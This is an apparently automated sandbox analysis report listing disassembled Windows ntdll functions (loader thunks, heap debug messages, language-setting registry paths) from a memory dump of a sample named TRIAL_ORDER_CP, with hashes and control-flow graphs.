                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b542c24bfbe670421b38dad8eacde2a2cf3d290aa3a96501b4857b46be9fac5f
                                          • Instruction ID: 97cf9a76f8e2b7a984c992fcaf23eb323702d1dd4853ba3d5e9e00a01f05e393
                                          • Opcode Fuzzy Hash: b542c24bfbe670421b38dad8eacde2a2cf3d290aa3a96501b4857b46be9fac5f
                                          • Instruction Fuzzy Hash: A090023160510802D54061584624706100547D020AF61D826A0418528ED7A5895575A3
                                          Function 33B52B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1 33b52b90-33b52b9c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 180459459235e4639007360406a28b9cb2ff4e8918380dece9f2fe5d9915ed74
                                          • Instruction ID: 8bec81f3d27aba20f47acaa0910d300495dc00cc2e391c090089b27b70856b5d
                                          • Opcode Fuzzy Hash: 180459459235e4639007360406a28b9cb2ff4e8918380dece9f2fe5d9915ed74
                                          • Instruction Fuzzy Hash: 8690023120108C02D5506158851474A000547D030AF55D826A4418618ED6A588957122
                                          Function 33B52BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2 33b52bc0-33b52bcc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6f4cbbea7da9a934d1171cba200e4340fde7dc88f88509be6396b869ed22534c
                                          • Instruction ID: 9cb7b60a7863181ad4d786cc8cdfaa941db3e9722f81148e978d73e1738fd54f
                                          • Opcode Fuzzy Hash: 6f4cbbea7da9a934d1171cba200e4340fde7dc88f88509be6396b869ed22534c
                                          • Instruction Fuzzy Hash: 3290023120100802D54065985518646000547E030AF51E426A5018515FD67588957132
                                          Function 33B52A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 33b52a80-33b52a8c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: df467a3753909e3c64a732954e667425ef305fc22c66219ec87a1fd1c9f928da
                                          • Instruction ID: bde3881b6f12d86b198127648734ccb70a5355c32cabd6ff8a589e495c2357ce
                                          • Opcode Fuzzy Hash: df467a3753909e3c64a732954e667425ef305fc22c66219ec87a1fd1c9f928da
                                          • Instruction Fuzzy Hash: D090026120200403454571584524616400A47E020AB51D436E1008550ED53588957126
                                          Function 33B52EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4 33b52eb0-33b52ebc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ca59f929ec56302028d1ba77669a8269f5f75fa48fa12788b1b4a070ecdbe66c
                                          • Instruction ID: 28de24dcfbd488db417fb1d66483fb9ff20ac2f6daa5a75c7373b8af65323bba
                                          • Opcode Fuzzy Hash: ca59f929ec56302028d1ba77669a8269f5f75fa48fa12788b1b4a070ecdbe66c
                                          • Instruction Fuzzy Hash: DD90023120140802D5406158492470B000547D030BF51D426A1158515ED63588557572
                                          Function 33B52D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3 33b52d10-33b52d1c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c135d469602d82d3ae835530b21d20ddb02b75f59eb58e09ea89bce7164d700d
                                          • Instruction ID: 71586b8e709a3f258762744d48334707056aba7bf698963dcf738ea866804d7b
                                          • Opcode Fuzzy Hash: c135d469602d82d3ae835530b21d20ddb02b75f59eb58e09ea89bce7164d700d
                                          • Instruction Fuzzy Hash: DD90023120100813D55161584614707000947D024AF91D827A0418518EE6668956B122

                                          Non-executed Functions

                                          Function 33BB9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 570 33bb9060-33bb90a9 571 33bb90ab-33bb90b0 570->571 572 33bb90f8-33bb9107 570->572 573 33bb90b4-33bb90ba 571->573 572->573 574 33bb9109-33bb910e 572->574 575 33bb90c0-33bb90e4 call 33b58f40 573->575 576 33bb9215-33bb923d call 33b58f40 573->576 577 33bb9893-33bb98a7 call 33b54b50 574->577 584 33bb9113-33bb91b4 GetPEB call 33bbd7e5 575->584 585 33bb90e6-33bb90f3 call 33bd92ab 575->585 586 33bb923f-33bb925a call 33bb98aa 576->586 587 33bb925c-33bb9292 576->587 596 33bb91d2-33bb91e7 584->596 597 33bb91b6-33bb91c4 584->597 598 33bb91fd-33bb9210 RtlDebugPrintTimes 585->598 588 33bb9294-33bb9296 586->588 587->588 588->577 593 33bb929c-33bb92b1 RtlDebugPrintTimes 588->593 593->577 604 33bb92b7-33bb92be 593->604 596->598 600 33bb91e9-33bb91ee 596->600 597->596 599 33bb91c6-33bb91cb 597->599 598->577 599->596 602 33bb91f3-33bb91f6 600->602 603 33bb91f0 600->603 602->598 603->602 604->577 606 33bb92c4-33bb92df 604->606 607 33bb92e3-33bb92f4 call 33bba388 606->607 610 33bb92fa-33bb92fc 607->610 611 33bb9891 607->611 610->577 612 33bb9302-33bb9309 610->612 611->577 613 33bb930f-33bb9314 612->613 614 33bb947c-33bb9482 612->614 617 33bb933c 613->617 618 33bb9316-33bb931c 613->618 615 33bb9488-33bb94b7 call 33b58f40 614->615 616 33bb961c-33bb9622 614->616 632 33bb94b9-33bb94c4 615->632 633 33bb94f0-33bb9505 615->633 621 33bb9674-33bb9679 616->621 622 33bb9624-33bb962d 616->622 619 33bb9340-33bb9391 call 33b58f40 RtlDebugPrintTimes 617->619 618->617 623 33bb931e-33bb9332 618->623 619->577 659 33bb9397-33bb939b 619->659 627 33bb9728-33bb9731 621->627 628 33bb967f-33bb9687 621->628 622->607 626 33bb9633-33bb966f call 33b58f40 622->626 629 33bb9338-33bb933a 623->629 630 33bb9334-33bb9336 623->630 653 33bb9869 626->653 627->607 634 33bb9737-33bb973a 627->634 636 33bb9689-33bb968d 628->636 637 33bb9693-33bb96bd call 33bb8093 628->637 629->619 630->619 639 33bb94cf-33bb94ee 632->639 640 33bb94c6-33bb94cd 632->640 644 33bb9511-33bb9518 633->644 645 33bb9507-33bb9509 633->645 641 33bb97fd-33bb9834 call 33b58f40 634->641 642 33bb9740-33bb978a 634->642 636->627 636->637 656 33bb9888-33bb988c 637->656 657 33bb96c3-33bb971e call 33b58f40 RtlDebugPrintTimes 637->657 652 33bb9559-33bb9576 RtlDebugPrintTimes 639->652 640->639 668 33bb983b-33bb9842 641->668 669 33bb9836 641->669 650 33bb978c 642->650 651 33bb9791-33bb979e 642->651 647 33bb953d-33bb953f 644->647 654 33bb950b-33bb950d 645->654 655 33bb950f 645->655 660 33bb951a-33bb9524 647->660 661 33bb9541-33bb9557 647->661 650->651 662 33bb97aa-33bb97ad 651->662 663 33bb97a0-33bb97a3 651->663 652->577 684 33bb957c-33bb959f call 33b58f40 652->684 664 33bb986d 653->664 654->644 655->644 656->607 657->577 702 33bb9724 657->702 670 33bb93eb-33bb9400 659->670 671 33bb939d-33bb93a5 659->671 665 33bb952d 660->665 666 33bb9526 660->666 661->652 674 33bb97b9-33bb97fb 662->674 675 33bb97af-33bb97b2 662->675 663->662 673 33bb9871-33bb9886 RtlDebugPrintTimes 664->673 678 33bb952f-33bb9531 665->678 666->661 676 33bb9528-33bb952b 666->676 679 33bb984d 668->679 680 33bb9844-33bb984b 668->680 669->668 683 33bb9406-33bb9414 670->683 681 33bb93d2-33bb93e9 671->681 682 33bb93a7-33bb93d0 call 33bb8093 671->682 673->577 673->656 674->673 675->674 676->678 686 33bb953b 678->686 687 33bb9533-33bb9535 678->687 688 33bb9851-33bb9857 679->688 680->688 681->683 690 33bb9418-33bb946f call 33b58f40 RtlDebugPrintTimes 682->690 683->690 700 33bb95bd-33bb95d8 684->700 701 33bb95a1-33bb95bb 684->701 686->647 687->686 695 33bb9537-33bb9539 687->695 696 33bb9859-33bb985c 688->696 697 33bb985e-33bb9864 688->697 690->577 706 33bb9475-33bb9477 690->706 695->647 696->653 697->664 703 33bb9866 697->703 704 33bb95dd-33bb960b RtlDebugPrintTimes 700->704 701->704 702->627 703->653 704->577 708 33bb9611-33bb9617 704->708 706->656 708->634
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $ $0
                                          • API String ID: 3446177414-3352262554
                                          • Opcode ID: 595d8b72560caf37d834888372a2d3905c26a13a3e8afae58acaa33ceb46c9e0
                                          • Instruction ID: 7cdefce1001d730647bcfda6ea5625692a6889fd57feca2a15773811e41a7b15
                                          • Opcode Fuzzy Hash: 595d8b72560caf37d834888372a2d3905c26a13a3e8afae58acaa33ceb46c9e0
                                          • Instruction Fuzzy Hash: 363201B1A083818FE750CF68C884B6BBBF5BB88344F04492EF599C7250DB75E949CB52
                                          Function 33BBFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 897 33bbfdf4-33bbfe16 call 33b67be4 900 33bbfe18-33bbfe30 RtlDebugPrintTimes 897->900 901 33bbfe35-33bbfe4d call 33b07662 897->901 905 33bc02d1-33bc02e0 900->905 906 33bbfe53-33bbfe69 901->906 907 33bc0277 901->907 909 33bbfe6b-33bbfe6e 906->909 910 33bbfe70-33bbfe72 906->910 908 33bc027a-33bc02ce call 33bc02e6 907->908 908->905 912 33bbfe73-33bbfe8a 909->912 910->912 913 33bbfe90-33bbfe93 912->913 914 33bc0231-33bc023a GetPEB 912->914 913->914 916 33bbfe99-33bbfea2 913->916 918 33bc023c-33bc0257 GetPEB call 33b0b910 914->918 919 33bc0259-33bc025e call 33b0b910 914->919 920 33bbfebe-33bbfed1 call 33bc0835 916->920 921 33bbfea4-33bbfebb call 33b1fed0 916->921 927 33bc0263-33bc0274 call 33b0b910 918->927 919->927 932 33bbfedc-33bbfef0 call 33b0753f 920->932 933 33bbfed3-33bbfeda 920->933 921->920 927->907 936 33bbfef6-33bbff02 GetPEB 932->936 937 33bc0122-33bc0127 932->937 933->932 938 33bbff70-33bbff7b 936->938 939 33bbff04-33bbff07 936->939 937->908 940 33bc012d-33bc0139 GetPEB 937->940 943 33bc0068-33bc007a call 33b22710 938->943 944 33bbff81-33bbff88 938->944 945 33bbff09-33bbff24 GetPEB call 33b0b910 939->945 946 33bbff26-33bbff2b call 33b0b910 939->946 941 33bc013b-33bc013e 940->941 942 33bc01a7-33bc01b2 940->942 947 33bc015d-33bc0162 call 33b0b910 941->947 948 33bc0140-33bc015b GetPEB call 33b0b910 941->948 942->908 952 33bc01b8-33bc01c3 942->952 965 33bc0110-33bc011d call 33bc0d24 call 33bc0835 943->965 966 33bc0080-33bc0087 943->966 944->943 951 33bbff8e-33bbff97 944->951 956 33bbff30-33bbff51 call 33b0b910 GetPEB 945->956 946->956 964 33bc0167-33bc017b call 33b0b910 947->964 948->964 959 33bbff99-33bbffa9 951->959 960 33bbffb8-33bbffbc 951->960 952->908 961 33bc01c9-33bc01d4 952->961 956->943 986 33bbff57-33bbff6b 956->986 959->960 967 33bbffab-33bbffb5 call 33bcd646 959->967 969 33bbffce-33bbffd4 960->969 970 33bbffbe-33bbffcc call 33b43ae9 960->970 961->908 968 33bc01da-33bc01e3 GetPEB 961->968 996 33bc017e-33bc0188 GetPEB 964->996 965->937 975 33bc0089-33bc0090 966->975 976 33bc0092-33bc009a 966->976 967->960 979 33bc01e5-33bc0200 GetPEB call 33b0b910 968->979 980 33bc0202-33bc0207 call 33b0b910 968->980 972 33bbffd7-33bbffe0 969->972 970->972 984 33bbfff2-33bbfff5 972->984 985 33bbffe2-33bbfff0 972->985 975->976 988 33bc009c-33bc00ac 976->988 989 33bc00b8-33bc00bc 976->989 993 33bc020c-33bc022c call 33bb823a call 33b0b910 979->993 980->993 994 33bc0065 984->994 995 33bbfff7-33bbfffe 984->995 985->984 986->943 988->989 997 33bc00ae-33bc00b3 call 33bcd646 988->997 999 33bc00ec-33bc00f2 989->999 1000 33bc00be-33bc00d1 call 33b43ae9 989->1000 993->996 994->943 995->994 1003 33bc0000-33bc000b 995->1003 996->908 1005 33bc018e-33bc01a2 996->1005 997->989 1004 33bc00f5-33bc00fc 999->1004 1011 33bc00e3 1000->1011 1012 33bc00d3-33bc00e1 call 33b3fdb9 1000->1012 1003->994 1009 33bc000d-33bc0016 GetPEB 1003->1009 1004->965 1010 33bc00fe-33bc010e 1004->1010 1005->908 1014 33bc0018-33bc0033 GetPEB call 33b0b910 1009->1014 1015 33bc0035-33bc003a call 33b0b910 1009->1015 1010->965 1017 33bc00e6-33bc00ea 1011->1017 1012->1017 1023 33bc003f-33bc005d call 33bb823a call 33b0b910 1014->1023 1015->1023 1017->1004 1023->994
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 3446177414-1700792311
                                          • Opcode ID: 29d85cfc95e105bb007be5cfb8ef8865fde33a5ba4480efd049fef6667d1c343
                                          • Instruction ID: aaae615242c01edefcd481d36cd53f59487b101b07951512e9a57f290183b003
                                          • Opcode Fuzzy Hash: 29d85cfc95e105bb007be5cfb8ef8865fde33a5ba4480efd049fef6667d1c343
                                          • Instruction Fuzzy Hash: C2D1EF399017C5DFDB12DFA8C440AAABBF5FF49304F498469E484AB662CB39D981CF10
                                          Function 33BBF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          • Opcode ID: 9f07e1cfe3761ed6b054646ff81fde009d2033a9691d5136714137efec53cab7
                                          • Instruction ID: c3b9dfbff08dfe9bf8e7ad2db73a19986e03ff1b0511323918bb1927f394168f
                                          • Opcode Fuzzy Hash: 9f07e1cfe3761ed6b054646ff81fde009d2033a9691d5136714137efec53cab7
                                          • Instruction Fuzzy Hash: A391DF79A007859FDF01CFA8C440AADBBF2FF49354F488669E485AB652CB75DA41CF20
                                          Function 33B0D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                          • API String ID: 0-3532704233
                                          • Opcode ID: 218c2e078614a99eaaf7e38129d7ea6b3984a0910dcbeb82fcdb42d62b1221ce
                                          • Instruction ID: 90d50f546283c7272252dcfd157abb8e9d2ce0e620da1ef11dedb68db7a0bebb
                                          • Opcode Fuzzy Hash: 218c2e078614a99eaaf7e38129d7ea6b3984a0910dcbeb82fcdb42d62b1221ce
                                          • Instruction Fuzzy Hash: A3B18BB69093519FD711CF64C880A5FBBE8EB84798F45493EF988D7280DB70D9488F92
                                          Function 33B3D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 33B3D879
                                            • Part of subcall function 33B14779: RtlDebugPrintTimes.NTDLL ref: 33B14817
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1975516107
                                          • Opcode ID: 16f1dde93dd649dec0c9cef0f9289d5349392c404019fbe184d991cf8599edb5
                                          • Instruction ID: e69c284300f159b5816f3a82da0a7e959c11c24dda67fb302fa651451ac7cf5b
                                          • Opcode Fuzzy Hash: 16f1dde93dd649dec0c9cef0f9289d5349392c404019fbe184d991cf8599edb5
                                          • Instruction Fuzzy Hash: F551DBB5A053A59FEB04DFA4C584B89BBF1FF453A8F24416DD810AB691DB70A842CB80
                                          Function 33B0D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 33B0D06F
                                          • @, xrefs: 33B0D2B3
                                          • @, xrefs: 33B0D09D
                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 33B0D136
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 33B0D263
                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 33B0D202
                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 33B0D0E6
                                          • @, xrefs: 33B0D24F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                          • API String ID: 0-1356375266
                                          • Opcode ID: 13298f397fb867370552f5726287ec0c131cb45a848890c0c4b966fb6a986403
                                          • Instruction ID: 7eebeb5ff4fbe064a5249e7c4d35db95da5538614f0514ebac4ca2aad8b5544c
                                          • Opcode Fuzzy Hash: 13298f397fb867370552f5726287ec0c131cb45a848890c0c4b966fb6a986403
                                          • Instruction Fuzzy Hash: 74A13BB19083559FE721CF14C850B5BBBE8FB84799F00493EFA9896281DB74D948CF92
                                          Function 33BBF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                          • API String ID: 0-2224505338
                                          • Opcode ID: f79e9805e77882f26cf8dc512eb2486ecb78e8d65e22de412e2015d72659bceb
                                          • Instruction ID: 41f8b898ef9aac41ee85f18d1d66769bc53c9cab607c32b76fb2e2c9ccb7d545
                                          • Opcode Fuzzy Hash: f79e9805e77882f26cf8dc512eb2486ecb78e8d65e22de412e2015d72659bceb
                                          • Instruction Fuzzy Hash: C051E636912345EFDB01CFE8D884E6A7BB4EF04664F1489B6F8459B622CF75D990CE10
                                          Function 33B98633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                          Download Yara Rule
                                          Strings
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 33B986BD
                                          • AVRF: -*- final list of providers -*- , xrefs: 33B9880F
                                          • VerifierDlls, xrefs: 33B9893D
                                          • HandleTraces, xrefs: 33B9890F
                                          • VerifierFlags, xrefs: 33B988D0
                                          • VerifierDebug, xrefs: 33B98925
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 33B986E7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          • Opcode ID: 614e92acf51f8c3f8407b5b140e805e620cbbcf88ec4e9aad317df814d307f7d
                                          • Instruction ID: 33152adb4c4fc6435c87d013abd24392f99fd5983cd71285aecbf4c179c6429c
                                          • Opcode Fuzzy Hash: 614e92acf51f8c3f8407b5b140e805e620cbbcf88ec4e9aad317df814d307f7d
                                          • Instruction Fuzzy Hash: D79102B29093A1AFF711DF24C880F9AB7D8EB44659F4545B9F980EB652C730EC05CBA1
                                          Function 33B3237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          • apphelp.dll, xrefs: 33B32382
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B7A7AF
                                          • LdrpDynamicShimModule, xrefs: 33B7A7A5
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 33B7A79F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-176724104
                                          • Opcode ID: d20cfa2add0f9505075375a0496d30a080e6501ecc89a00507bd4333610545ae
                                          • Instruction ID: 1c7a57e31915d71e8e834154ece88978eab22b1340b97407507f1add4e8d0b22
                                          • Opcode Fuzzy Hash: d20cfa2add0f9505075375a0496d30a080e6501ecc89a00507bd4333610545ae
                                          • Instruction Fuzzy Hash: 9831F376A01290EFEB50AF58C880E9A77F8FF80754F190179E820BB351DBB19D42CB50
                                          Function 33B0F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
